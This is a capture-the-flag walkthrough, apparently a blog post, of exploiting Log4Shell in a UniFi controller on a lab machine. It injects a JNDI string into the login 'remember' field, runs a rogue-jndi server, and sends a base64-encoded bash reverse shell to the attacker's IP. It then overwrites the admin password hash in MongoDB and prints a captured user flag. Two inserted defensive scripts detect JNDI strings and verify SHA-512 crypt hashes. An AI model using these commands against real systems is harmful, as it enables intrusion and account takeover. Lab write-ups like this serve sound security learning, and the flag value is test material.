SF:\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Language:\x20en\r
SF:\nContent-Length:\x20435\r\nDate:\x20Mon,\x2005\x20Jun\x202023\x2009:15
SF::12\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html><html\x20la
SF:ng=\"en\"><head><title>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20
SF:Request</title><style\x20type=\"text/css\">body\x20{font-family:Tahoma,
SF:Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;background
SF:-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-size:16px;}\
SF:x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20{color:bla
SF:ck;}\x20\.line\x20{height:1px;background-color:#525D76;border:none;}</s
SF:tyle></head><body><h1>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20R
SF:equest</h1></body></html>");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8843-TCP:V=7.93%T=SSL%I=7%D=6/5%Time=647DA7B0%P=x86_64-pc-linux-gnu
SF:%r(GetRequest,24E,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;c
SF:harset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20435\r\nDa
SF:te:\x20Mon,\x2005\x20Jun\x202023\x2009:15:29\x20GMT\r\nConnection:\x20c
SF:lose\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x2
SF:0Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=
SF:\"text/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h
SF:2,\x20h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x20{fon
SF:t-size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;}\x20
SF:p\x20{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{height:1px;
SF:background-color:#525D76;border:none;}</style></head><body><h1>HTTP\x20
SF:Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</h1></body></html>")%r(
SF:HTTPOptions,24E,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;cha
SF:rset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20435\r\nDate
SF::\x20Mon,\x2005\x20Jun\x202023\x2009:15:29\x20GMT\r\nConnection:\x20clo
SF:se\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20S
SF:tatus\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"
SF:text/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,
SF:\x20h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x20{font-
SF:size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;}\x20p\
SF:x20{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{height:1px;ba
SF:ckground-color:#525D76;border:none;}</style></head><body><h1>HTTP\x20St
SF:atus\x20400\x20\xe2\x80\x93\x20Bad\x20Request</h1></body></html>")%r(RT
SF:SPRequest,24E,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;chars
SF:et=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20435\r\nDate:\
SF:x20Mon,\x2005\x20Jun\x202023\x2009:15:29\x20GMT\r\nConnection:\x20close
SF:\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Sta
SF:tus\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"te
SF:xt/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x
SF:20h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x20{font-si
SF:ze:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;}\x20p\x2
SF:0{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{height:1px;back
SF:ground-color:#525D76;border:none;}</style></head><body><h1>HTTP\x20Stat
SF:us\x20400\x20\xe2\x80\x93\x20Bad\x20Request</h1></body></html>");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8880-TCP:V=7.93%I=7%D=6/5%Time=647DA7A0%P=x86_64-pc-linux-gnu%r(Get
SF:Request,24E,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;charset
SF:=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20435\r\nDate:\x2
SF:0Mon,\x2005\x20Jun\x202023\x2009:15:12\x20GMT\r\nConnection:\x20close\r
SF:\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Statu
SF:s\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"text
SF:/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20
SF:h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x20{font-size
SF::22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{
SF:font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{height:1px;backgr
SF:ound-color:#525D76;border:none;}</style></head><body><h1>HTTP\x20Status
SF:\x20400\x20\xe2\x80\x93\x20Bad\x20Request</h1></body></html>")%r(FourOh
SF:FourRequest,24A,"HTTP/1\.1\x20404\x20\r\nContent-Type:\x20text/html;cha
SF:rset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20431\r\nDate
SF::\x20Mon,\x2005\x20Jun\x202023\x2009:15:12\x20GMT\r\nConnection:\x20clo
SF:se\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20S
SF:tatus\x20404\x20\xe2\x80\x93\x20Not\x20Found</title><style\x20type=\"te
SF:xt/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x
SF:20h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x20{font-si
SF:ze:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;}\x20p\x2
SF:0{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{height:1px;back
SF:ground-color:#525D76;border:none;}</style></head><body><h1>HTTP\x20Stat
SF:us\x20404\x20\xe2\x80\x93\x20Not\x20Found</h1></body></html>")%r(HTTPOp
SF:tions,24E,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;charset=u
SF:tf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20435\r\nDate:\x20M
SF:on,\x2005\x20Jun\x202023\x2009:15:17\x20GMT\r\nConnection:\x20close\r\n
SF:\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Status\
SF:x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"text/c
SF:ss\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3
SF:,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x20{font-size:2
SF:2px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{fo
SF:nt-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{height:1px;backgrou
SF:nd-color:#525D76;border:none;}</style></head><body><h1>HTTP\x20Status\x
SF:20400\x20\xe2\x80\x93\x20Bad\x20Request</h1></body></html>");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 172.46 seconds

The proxy on port 8080 appears to redirect to port 8443.

A quick search turns up known vulnerability information for this service.

I tried using the first tool directly, without success; I then tried the steps from the second tutorial, and still got no reverse shell. It only worked with Burp Suite.

Here are the concrete steps. First we need to confirm the vulnerability exists: in Burp, put ${jndi:ldap://{Tun0 IP Address}/whatever} in quotes as the string value of the remember field of the submitted JSON. The response is an error message, which by itself is not enough to confirm the vulnerability, so we also run tcpdump on the attacking machine to capture traffic on port 389 (the port used by the LDAP protocol):

┌──(karti㉿kali-ctf)-[~]  
└─$ sudo tcpdump -i tun0 port 389
[sudo] password for karti:
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
07:27:34.587217 IP 10.129.96.149.53060 > kali-ctf.ldap: Flags [S], seq 4162792509, win 64240, options [mss 1285,sackOK,TS val 1408506213 ecr 0,nop,wscale 7], length 0
07:27:34.587236 IP kali-ctf.ldap > 10.129.96.149.53060: Flags [R.], seq 0, ack 4162792510, win 0, length 0

Building the malicious server

The inbound connection on port 389 confirms that the vulnerability exists. Next we need to build the malicious server: when the target connects to it, the command is delivered from the malicious server to the target. Build the malicious server:

sudo apt-get install openjdk-11-jdk
sudo apt-get install maven   # verify the version with mvn -v; Maven is the build automation tool for Java projects
git clone https://github.com/veracode-research/rogue-jndi
cd rogue-jndi                # a malicious LDAP server used for JNDI injection attacks
mvn package

The built jar is placed in the rogue-jndi/target/ directory. Next we construct the payload and hand it to the Rogue-JNDI server:

┌──(i3eg1nner㉿minilite)-[~]
└─$ echo "bash -c bash -i >&/dev/tcp/10.10.14.109/4444 0>&1" | base64
YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMTA5LzQ0NDQgMD4mMQo=

We use base64 to avoid encoding problems, then pass it to Rogue-JNDI:

┌──(i3eg1nner㉿minilite)-[~/Downloads/startpoint/Log4jUnifi/utils]
└─$ java -jar rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMTA5LzQ0NDQgMD4mMQo=}|{base64,-d}|{bash,-i}" --hostname "10.10.14.109"
+-+-+-+-+-+-+-+-+-+
|R|o|g|u|e|J|n|d|i|
+-+-+-+-+-+-+-+-+-+
Starting HTTP server on 0.0.0.0:8000
Starting LDAP server on 0.0.0.0:1389
Mapping ldap://10.10.14.109:1389/o=websphere1 to artsploit.controllers.WebSphere1
Mapping ldap://10.10.14.109:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
Mapping ldap://10.10.14.109:1389/o=websphere2 to artsploit.controllers.WebSphere2
Mapping ldap://10.10.14.109:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
Mapping ldap://10.10.14.109:1389/o=tomcat to artsploit.controllers.Tomcat
Mapping ldap://10.10.14.109:1389/o=groovy to artsploit.controllers.Groovy
Mapping ldap://10.10.14.109:1389/ to artsploit.controllers.RemoteReference
Mapping ldap://10.10.14.109:1389/o=reference to artsploit.controllers.RemoteReference

Once it is running, we also start nc listening on the corresponding port, then use Burp to capture the login POST request, write ${jndi:ldap://{Your Tun0 IP}:1389/o=tomcat} into remember, and send it. The server on the attacking machine prints the following:

Sending LDAP ResourceRef result for o=tomcat with javax.el.ELProcessor payload
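From the defender's side, the two JNDI strings used above (the `${jndi:ldap://.../whatever}` probe and the `${jndi:ldap://...:1389/o=tomcat}` payload in the `remember` field) are exactly what a detection rule should key on. The following Python script is an added example, not code from the original post or from UniFi: it scans constructed sample events (a UniFi-style `/api/login` JSON body and a URL-encoded access-log line, both made up for this example and reusing the post's own IP addresses) for JNDI lookups, reports the JSON field each sits in, and extracts the callback host and port so they can be blocked at egress.

```python
"""Added example: flag Log4Shell-style JNDI lookup strings in login requests.

Not part of the original post. The sample events below are constructed; the
first mimics the UniFi /api/login JSON body the post modifies in Burp.
"""
import json
import re
from urllib.parse import unquote

# Constructed sample events (NOT real captures): a UniFi-style login body with
# the lookup in the "remember" field, a benign login, and a URL-encoded
# access-log line carrying the same pattern in the User-Agent position.
SAMPLE_EVENTS = [
    '{"username":"admin","password":"admin",'
    '"remember":"${jndi:ldap://10.10.14.109:1389/o=tomcat}","strict":true}',
    '{"username":"michael","password":"hunter2","remember":true,"strict":true}',
    '10.129.96.149 - - [05/Jun/2023:09:15:12 +0000] "POST /api/login HTTP/1.1" '
    '400 435 "-" "%24%7Bjndi%3Aldap%3A%2F%2F10.10.14.109%2Fwhatever%7D"',
]

# Well-formed lookup: ${jndi:<scheme>://host[:port]/path}
STRICT = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>ldaps?|rmi|dns|iiop|corba|nds|http)\s*:\s*//"
    r"\s*(?P<host>[^:/\s}]+)(?::(?P<port>\d+))?(?P<path>[^}]*)\}",
    re.IGNORECASE,
)
# Anything that opens a lookup and mentions jndi before it closes: catches
# mangled or partially encoded variants the strict pattern misses.
LOOSE = re.compile(r"\$\{[^}]*jndi", re.IGNORECASE)


def normalize(text: str) -> str:
    """URL-decode up to three times (proxies sometimes double-encode)."""
    prev, cur = None, text
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, unquote(cur)
    return cur


def iter_strings(obj, path=""):
    """Yield (json_path, string_value) for every string inside a JSON value."""
    if isinstance(obj, dict):
        for key, val in obj.items():
            yield from iter_strings(val, f"{path}.{key}" if path else key)
    elif isinstance(obj, list):
        for idx, val in enumerate(obj):
            yield from iter_strings(val, f"{path}[{idx}]")
    elif isinstance(obj, str):
        yield path, obj


def scan_event(raw: str) -> list:
    """Return one finding per JNDI lookup found in a request body or log line."""
    try:
        candidates = list(iter_strings(json.loads(raw))) or [("body", raw)]
    except ValueError:  # not JSON: treat the whole line as one string
        candidates = [("line", raw)]
    findings = []
    for where, value in candidates:
        text = normalize(value)
        hits = list(STRICT.finditer(text))
        for m in hits:
            findings.append({
                "where": where,
                "scheme": m.group("scheme").lower(),
                "host": m.group("host"),
                "port": int(m.group("port")) if m.group("port") else None,
                "path": m.group("path"),
            })
        if not hits and LOOSE.search(text):
            findings.append({"where": where, "scheme": None, "host": None,
                             "port": None, "path": None})
    return findings


def scan_events(events: list) -> list:
    """Scan a batch of events, tagging each finding with its event index."""
    report = []
    for idx, raw in enumerate(events):
        for finding in scan_event(raw):
            finding["event"] = idx
            report.append(finding)
    return report


def callback_indicators(report: list) -> set:
    """host[:port] values to block at the egress firewall or alert on in DNS."""
    out = set()
    for f in report:
        if f["host"]:
            out.add(f"{f['host']}:{f['port']}" if f["port"] else f["host"])
    return out


if __name__ == "__main__":
    hits = scan_events(SAMPLE_EVENTS)
    for h in hits:
        print(h)
    print("block:", sorted(callback_indicators(hits)))
```

The tcpdump check earlier in the post is the same idea seen from the other end: a vulnerable host makes an outbound LDAP connection to whatever host the string names, so an egress rule that denies LDAP/RMI from application servers, plus an alert on the `${jndi:` pattern in request bodies, covers both the probe and the real payload.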

Looking back at the nc listener, we have received a connection:

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.109] from (UNKNOWN) [10.129.47.12] 38170
whoami
unifi
which python
which python3
which python2
which ls
/bin/ls
script /dev/null -c bash
Script started, file is /dev/null
unifi@unified:/usr/lib/unifi$

Since there is no Python environment, I was not used to it at first; after a look at the writeup, I used script /dev/null -c bash.

Information gathering after getting the shell

unifi@unified:/usr/lib/unifi/data/db$ cd ../backup
cd ../backup
unifi@unified:/usr/lib/unifi/data/backup$ ls
ls
6.4.54.unf autobackup meta.json
unifi@unified:/usr/lib/unifi/data/backup$ ls -liah
ls -liah
total 24K
43513 drwxr-xr-x 3 unifi unifi 4.0K Jan 2 2022 .
37973 drwxr-xr-x 4 unifi unifi 4.0K Jun 6 08:23 ..
37705 -rw-r--r-- 1 unifi unifi 7.7K Dec 31 2021 6.4.54.unf
43518 drwxr-xr-x 2 unifi unifi 4.0K Jan 2 2022 autobackup
37892 -rw-r--r-- 1 unifi unifi 123 Dec 31 2021 meta.json
unifi@unified:/usr/lib/unifi/data/backup$ cat meta.json
cat meta.json
{"6.4.54":{"version":"6.4.54","time":1640911998680,"datetime":"2021-12-31T00:53:18Z","format":"bson","days":0,"size":7824}}
unifi@unified:/usr/lib/unifi/data/backup$ cd autobackup
cd autobackup
unifi@unified:/usr/lib/unifi/data/backup/autobackup$ ls
ls
unifi@unified:/usr/lib/unifi/data/backup/autobackup$ cd /
cd /
unifi@unified:/$ ls
ls
bin dev home lib64 mnt proc run srv tmp usr
boot etc lib media opt root sbin sys unifi var
unifi@unified:/$ cd /home
cd /home
unifi@unified:/home$ ls
ls
michael
unifi@unified:/home$ cd michael
cd michael
unifi@unified:/home/michael$ ls
ls
user.txt
unifi@unified:/home/michael$ cat user.txt
cat user.txt
6ced1a6a89e666c0620cdb10262ba127

Viewing process information with ps

unifi@unified:/home/michael$ ps aux
ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
unifi 1 0.0 0.0 1080 4 ? Ss 08:23 0:00 /sbin/docker-
unifi 6 0.0 0.1 18512 3140 ? S 08:23 0:00 bash /usr/loc
unifi 16 1.5 25.4 3670972 518176 ? Sl 08:23 0:46 java -Dunifi.
unifi 66 0.4 4.1 1099648 85388 ? Sl 08:23 0:13 bin/mongod --
unifi 1366 0.0 0.1 18380 2992 ? S 09:09 0:00 bash -c {echo
unifi 1370 0.0 0.1 18512 3180 ? S 09:09 0:00 bash -i
unifi 1373 0.0 0.1 18380 3088 ? S 09:09 0:00 bash
unifi 1389 0.0 0.1 19312 2180 ? S 09:10 0:00 script /dev/n
unifi 1390 0.0 0.0 4632 884 pts/0 Ss 09:10 0:00 sh -c bash
unifi 1391 0.0 0.1 18512 3416 pts/0 S 09:10 0:00 bash
unifi 1460 0.0 0.1 34408 2760 pts/0 R+ 09:12 0:00 ps aux
unifi@unified:/home/michael$ netstat -nat
netstat -nat
bash: netstat: command not found
unifi@unified:/home/michael$ netstat
netstat
bash: netstat: command not found
unifi@unified:/home/michael$ ps aux | grep mongo
ps aux | grep mongo
unifi 66 0.4 4.1 1099648 85388 ? Sl 08:23 0:14 bin/mongod --dbpath /usr/lib/unifi/data/db --port 27117 --unixSocketPrefix /usr/lib/unifi/run --logRotate reopen --logappend --logpath /usr/lib/unifi/logs/mongod.log --pidfilepath /usr/lib/unifi/run/mongod.pid --bind_ip 127.0.0.1
unifi 1503 0.0 0.0 11468 1040 pts/0 S+ 09:13 0:00 grep mongo

A small trick here: the output of ps aux shows no port information, because on a terminal the COMMAND column is cut off at the screen width, but when the output is piped through grep the full command line of the matching process is shown. This gives us the mongo port number. We use the command line to interact with the MongoDB service; a Google search confirms that the default UniFi database name is ace, and the following command retrieves the users and their shadow hashes:

mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"

Modifying the database from the mongo command line

The hash could not be cracked, but taking a different approach, we can simply overwrite the shadow value:

┌──(i3eg1nner㉿minilite)-[~]
└─$ mkpasswd -m sha-512 Password1234
$6$iUKnCe31IP2yVcQw$h01M94RtVE/dHAnBOMNr.DzK.XlT3gQtjo1xHd2j.g3ZKoS7ryrhi.F27uRON.DTkX/IwnF.dGAfUj5yGYnyd1

We use mkpasswd to generate a SHA-512 crypt hash, then write it into the admin document:
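For an analyst who recovers `x_shadow` values from the `ace` database after an incident, a pure-Python implementation of the same SHA-512 crypt scheme makes it possible to check a stored hash against a candidate password offline, for instance to spot an administrator hash that was replaced with the hash of a known password, as is done here. This is an added example, not code from the original post; it reimplements the glibc `$6$` algorithm on top of `hashlib` and uses the hash mkpasswd printed above for `Password1234` as its test vector.

```python
"""Added example (not from the original post): verify a $6$ SHA-512 crypt
hash in pure Python, so a recovered x_shadow value can be checked against a
candidate password offline, without mkpasswd or the deprecated crypt module.
"""
import hashlib
import hmac

# Hash mkpasswd printed in the post for "Password1234" with salt iUKnCe31IP2yVcQw.
PAGE_HASH = ("$6$iUKnCe31IP2yVcQw$h01M94RtVE/dHAnBOMNr.DzK.XlT3gQtjo1xHd2j."
             "g3ZKoS7ryrhi.F27uRON.DTkX/IwnF.dGAfUj5yGYnyd1")

B64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
# glibc emits the 64-byte digest as 21 byte-triples in this order plus byte 63.
ORDER = [(0, 21, 42), (22, 43, 1), (44, 2, 23), (3, 24, 45), (25, 46, 4),
         (47, 5, 26), (6, 27, 48), (28, 49, 7), (50, 8, 29), (9, 30, 51),
         (31, 52, 10), (53, 11, 32), (12, 33, 54), (34, 55, 13), (56, 14, 35),
         (15, 36, 57), (37, 58, 16), (59, 17, 38), (18, 39, 60), (40, 61, 19),
         (62, 20, 41)]


def _encode(digest: bytes) -> str:
    """crypt-style base64: 6 bits at a time, least significant bits first."""
    out = []
    for b2, b1, b0 in ORDER:
        w = (digest[b2] << 16) | (digest[b1] << 8) | digest[b0]
        for _ in range(4):
            out.append(B64[w & 0x3F])
            w >>= 6
    w = digest[63]
    for _ in range(2):
        out.append(B64[w & 0x3F])
        w >>= 6
    return "".join(out)


def sha512_crypt(password: str, salt: str, rounds=None) -> str:
    """glibc SHA-512 crypt. rounds=None means the default 5000 with no
    rounds= field in the output; an explicit value is clamped like glibc."""
    pw = password.encode()
    sl = salt.encode()[:16]  # glibc caps the salt at 16 bytes
    n_rounds = 5000 if rounds is None else min(max(rounds, 1000), 999_999_999)
    sha = hashlib.sha512
    # Digest B = SHA512(pw || salt || pw)
    b = sha(pw + sl + pw).digest()
    # Digest A = SHA512(pw || salt || B[:len(pw) mod 64] || bits of len(pw))
    a = sha(pw + sl)
    n = len(pw)
    while n > 64:
        a.update(b)
        n -= 64
    a.update(b[:n])
    n = len(pw)
    while n > 0:
        a.update(b if n & 1 else pw)
        n >>= 1
    da = a.digest()
    # P: SHA512(pw repeated len(pw) times), cycled to len(pw) bytes
    dp = sha(pw * len(pw)).digest()
    p = (dp * (len(pw) // 64 + 1))[:len(pw)]
    # S: SHA512(salt repeated 16 + A[0] times), cycled to len(salt) bytes
    ds = sha(sl * (16 + da[0])).digest()
    s = (ds * (len(sl) // 64 + 1))[:len(sl)]
    # Stretching loop: alternate inputs by round parity, skip S every 3rd
    # and P every 7th round, exactly as glibc does.
    c = da
    for i in range(n_rounds):
        h = sha()
        h.update(p if i & 1 else c)
        if i % 3:
            h.update(s)
        if i % 7:
            h.update(p)
        h.update(c if i & 1 else p)
        c = h.digest()
    prefix = "$6$" if rounds is None else f"$6$rounds={n_rounds}$"
    return f"{prefix}{sl.decode()}${_encode(c)}"


def verify(password: str, stored: str) -> bool:
    """Check a candidate password against a $6$ hash string (constant-time)."""
    parts = stored.split("$")  # ["", "6", ("rounds=N",) salt, hash]
    if len(parts) < 4 or parts[1] != "6":
        return False
    rounds = None
    if parts[2].startswith("rounds="):
        rounds = int(parts[2][len("rounds="):])
        salt = parts[3]
    else:
        salt = parts[2]
    return hmac.compare_digest(sha512_crypt(password, salt, rounds), stored)


if __name__ == "__main__":
    print(sha512_crypt("Password1234", "iUKnCe31IP2yVcQw") == PAGE_HASH)
```

`verify()` compares the recomputed string with `hmac.compare_digest` so that a bulk check of many stored hashes against a short list of known-bad passwords does not leak timing information; a mismatch on every candidate is the expected, healthy result.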

unifi@unified:/usr/lib/unifi$ mongo --port 27117 ace --eval 'db.admin.update({"_id":ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$iUKnCe31IP2yVcQw$h01M94RtVE/dHAnBOMNr.DzK.XlT3gQtjo1xHd2j.g3ZKoS7ryrhi.F27uRON.DTkX/IwnF.dGAfUj5yGYnyd1"}})'
MongoDB shell version v3.6.3
connecting to: mongodb://127.0.0.1:27117/ace
MongoDB server version: 3.6.3
WriteResult({ "nMatched" : 1, "nUpserted" : 0, "nModified" : 1 })

Run the previous find command again to check whether the update took effect; once confirmed, log in to the UniFi web interface.

Under Settings > Site, SSH authentication can be enabled, and the username and password are shown directly there.

Finally, log in over ssh to obtain root.txt.


Start_Point
https://i3eg1nner.github.io/2023/05/0ec9b4c0392c.html
Author: I3eg1nner
Published: 29 May 2023
License